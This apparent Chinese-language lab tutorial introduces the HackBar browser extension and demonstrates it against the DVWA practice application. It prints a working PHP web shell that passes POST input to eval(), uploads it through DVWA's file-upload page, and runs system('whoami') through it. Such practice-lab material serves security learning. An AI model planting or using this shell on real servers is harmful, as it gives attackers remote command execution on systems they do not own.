介绍
HackBar 是一个用于浏览器的扩展插件,主要用于进行网络渗透测试和安全评估。它提供了一系列方便的工具和功能,可以帮助用户执行各种网络攻击和测试,包括 XSS、SQL 注入、CSRF、路径穿越等
下载地址
可以到github上面去下载,我这边是https://github.com/Mr-xn/hackbar2.1.3 这个下载的
Google浏览器安装插件
打开Google浏览器->设置->扩展程序->管理扩展程序。这里需要开发开发者模式。
直接将HackBar-v2.3.1.zip拖入浏览器就行
HackBar使用
1、继续将我们的DVWA安全等级设置成lower
2、编写PHP注册代码文件
这里PHP的版本不一样,我们写的内容也有差异,我这里PHP是7.3.x 。我们这边将文件名字命名为webshell.php
<?php
$name=$_POST["info"];//接收POST请求的入参
if(empty($name)){
$name=phpinfo();//如果没有传入值,默认给phpinfo()
}
eval("\$name1= $name;");//执行$name命名的将返回的结果赋值给$name1。
?>3、上传webshell.php文件
我们在File Upload地方上传webshell.php文件
4、访问上传的webshell.php文件
我们通过浏览器访问上传的webshell.php文件可以看到默认打印了php的版本信息
5、使用HackBar进行操作
这里我们通过开发者模式调出HackBar插件。
- 先load URL 将需要访问的URL加载一下
- 选择Post data方式
- 在代码框里面编写执行代码,这里我们写入info=system('whoami')。意思就是将system('whoami')这个值赋值给webshell里面的info。
- 点击Execute
- 我们就可以看到浏览器里面打印出用户的信息
- 我们在输入其他的都可以打印出来,这里就不详细操作。
